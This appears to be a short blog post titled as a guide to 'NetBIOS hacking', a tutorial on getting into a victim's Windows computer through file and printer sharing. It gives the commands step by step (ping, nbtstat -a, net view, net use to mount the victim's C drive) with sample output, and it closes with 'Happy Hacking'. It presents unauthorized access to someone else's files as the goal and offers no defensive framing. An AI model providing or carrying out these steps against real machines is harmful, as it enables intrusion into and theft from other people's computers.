A Guide to NetBIOS Hacking.
NetBIOS Hacking- A Hacking method in which the hacker penetrates the victim through the "Sharing Files/Printer" option in the computer. The hacker can then r00t(mount) the computers main drive or what ever drive is shared and upload/download files from it. ultimately, YOUR SCREWED .
The How-To:
First, lets assume you have the IP of the victim and his/her computer is online. To make sure he/she is online, ping him/her like so:
ping xxx.xxx.xxx.xxx where xxx.xxx.xxx.xxx is the victims ip adress.
if you get a response saying:
64 bytes from 127.0.0.1: icmp_seq=23 ttl=64 time=0.092 ms
64 bytes from 127.0.0.1: icmp_seq=24 ttl=64 time=0.098 ms
64 bytes from 127.0.0.1: icmp_seq=25 ttl=64 time=0.096 ms
or the numbers can be different, their computer is online and connected to the internet.
Now, lets see if their computer drive is on share
type this in command prompt:
nbtstat -a xxx.xxx.xxx.xxx where xxx.xxx.xxx.xxx is their IP
You should get an output like so
NetBIOS Remote Machine Name TableName Type Status---------------------------------------------Computer001 <03> UNIQUECrap <03> UNIQUEComputer001 <00> UNIQUEWORKGROUP <00> GROUPComputer001 <20> UNIQUE---------------------------------------------
Do you see the "<20>"? if you see that on the netbios table, they have sharing enabled on their computer! So far so good.
Now, lets see what disk is shared by entering this command into command prompt:
net view \\xxx.xxx.xxx.xxx where xxx.xxx.xxx.xxx is the victims IP Adress.
Now you should get a response like this:
Shared resources at \\xxx.xxx.xxx.xxx
Sharename Type Comment
______________________
TEMP Disk
C Disk
______________________
The command was completed successfully.
What we are interested in is the C disk as as we see here, the name of the disk on shared is just "C". Now we can connnect to it with out any problems hopefully.
To connect, type this in:
net use x: \\xxx.xxx.xxx.xxx\C
What this will do is try to mount the drive "C" from "xxx.xxx.xxx.xxx" which will be drive "X" on your computer. If this worked you should get:
The command was completed successfully
Now check your My Computer and it should be there!
Success!
Happy Hacking
NOTE: Some drive require a password. Your on your own there
No comments:
Post a Comment